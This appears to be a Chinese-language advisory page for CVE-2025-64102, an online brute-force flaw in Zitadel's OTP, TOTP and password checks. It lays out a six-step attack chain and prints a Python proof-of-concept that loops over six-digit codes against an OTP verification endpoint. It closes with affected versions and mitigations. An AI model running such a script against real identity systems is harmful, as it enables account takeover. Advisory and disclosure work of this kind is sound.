CVE-2025-64102 Zitadel身份基础设施在线暴力攻击漏洞

漏洞信息

漏洞编号

CVE-2025-64102

漏洞类型

暴力攻击/认证机制缺陷

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Zitadel

漏洞概述

CVE-2025-64102是Zitadel开源身份基础设施软件中的一个严重安全漏洞，CVSS评分高达9.8分。该漏洞允许未经认证的攻击者通过互联网对OTP（一次性密码）、TOTP（基于时间的一次性密码）和用户密码进行在线暴力攻击。Zitadel虽然提供了锁定机制来防止此类暴力攻击，但该安全机制默认处于关闭状态，且在启用后可能导致合法用户遭遇拒绝服务问题。更为严重的是，研究人员发现针对较新版本的基于资源API接口，缓解策略未能得到完整实现，攻击者仍可通过API层面绕过现有的防护措施。此漏洞影响Zitadel多个重要版本，涵盖2.x、3.x和4.x系列，对使用该身份管理平台的企业和个人用户构成严重安全威胁，可能导致未授权访问、账户接管以及敏感数据泄露等严重后果。

技术细节

该漏洞源于Zitadel身份验证系统缺乏有效的暴力攻击防护机制。具体而言，系统在处理OTP、TOTP以及密码验证请求时，未实施充分的速率限制（Rate Limiting）或账户锁定策略。攻击者可以通过自动化工具对目标账户进行大规模登录尝试，利用常见的弱密码字典或OTP猜测技术，逐步破解用户凭证。技术分析显示，Zitadel的锁定机制虽然在代码层面存在，但存在以下问题：首先，默认配置中该机制处于禁用状态；其次，即使启用锁定功能，其实现逻辑存在缺陷，可能被攻击者利用造成对目标用户的DoS攻击；最后，在较新版本的RESTful API和gRPC API接口中，针对资源操作的暴力攻击防护措施未能完整部署。攻击者可以通过发送大量精心构造的认证请求，利用API端点（如/api/v1/authn、/auth/v1/users/*/password_check等）持续尝试验证，最终获得有效凭证。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标Zitadel实例，获取认证端点信息，包括/api/v1/authn、/auth/v1/users等API路径

STEP 2

步骤2：目标选择

攻击者选择目标用户账户，通常通过用户名、邮箱或用户ID进行定位，准备开始暴力破解攻击

STEP 3

步骤3：自动化攻击

攻击者部署自动化脚本或工具，针对OTP/TOTP验证端点发送大量认证请求，使用常见OTP模式或密码字典进行尝试

STEP 4

步骤4：绕过防护

由于Zitadel默认未启用账户锁定机制，且较新API缺乏完整的速率限制，攻击者可绕过现有防护持续进行攻击

STEP 5

步骤5：凭证获取

通过穷举尝试，攻击者成功获取有效的OTP/TOTP或密码凭证，获得目标账户访问权限

STEP 6

步骤6：账户接管

攻击者使用获取的凭证登录系统，可能进一步提升权限、访问敏感数据或执行恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import time import itertools # CVE-2025-64102 PoC - Zitadel OTP/TOTP Online Brute Force Attack # This PoC demonstrates the vulnerability in Zitadel authentication TARGET_URL = "https://your-zitadel-instance.com" TARGET_USER = "[email protected]" # Common OTP/TOTP patterns to try otp_patterns = [ f"{i:06d}" for i in range(1000000) # 6-digit OTPs ] def attempt_login(otp_code): """Attempt authentication with provided OTP code""" endpoint = f"{TARGET_URL}/auth/v1/users/{TARGET_USER}/otp_verify" payload = { "code": otp_code, "user_id": TARGET_USER } try: response = requests.post(endpoint, json=payload, timeout=5) if response.status_code == 200 and "access_token" in response.text: print(f"[SUCCESS] Valid OTP found: {otp_code}") return True except requests.exceptions.RequestException: pass return False def brute_force_otp(): """Brute force attack against Zitadel OTP authentication""" print(f"[*] Starting OTP brute force attack against {TARGET_USER}") print(f"[*] Target: {TARGET_URL}") # Note: In real attack scenario, attacker would iterate through OTP codes # This PoC is for educational/security research purposes only for i, otp in enumerate(otp_patterns[:10000]): # Limited iterations for demo if attempt_login(otp): return otp if i % 1000 == 0: print(f"[*] Attempted {i} OTP codes...") time.sleep(0.1) # Minimal delay, showing lack of rate limiting print("[*] Attack completed without success (or limit reached)") return None if __name__ == "__main__": brute_force_otp()

影响范围

Zitadel < 2.71.18

Zitadel < 3.4.3

Zitadel < 4.6.0

防御指南

临时缓解措施

立即将Zitadel升级到修复版本（4.6.0、3.4.3或2.71.18）；如无法立即升级，可在认证层面部署Web应用防火墙（WAF）或API网关，配置速率限制规则，限制单IP或单账户的认证尝试频率；同时启用Zitadel内置的账户锁定功能，并确保在所有API端点（包括较新的基于资源的API）上正确配置防护策略。建议监控认证日志，识别异常的暴力攻击模式，并考虑实施IP黑名单机制阻止已知攻击源。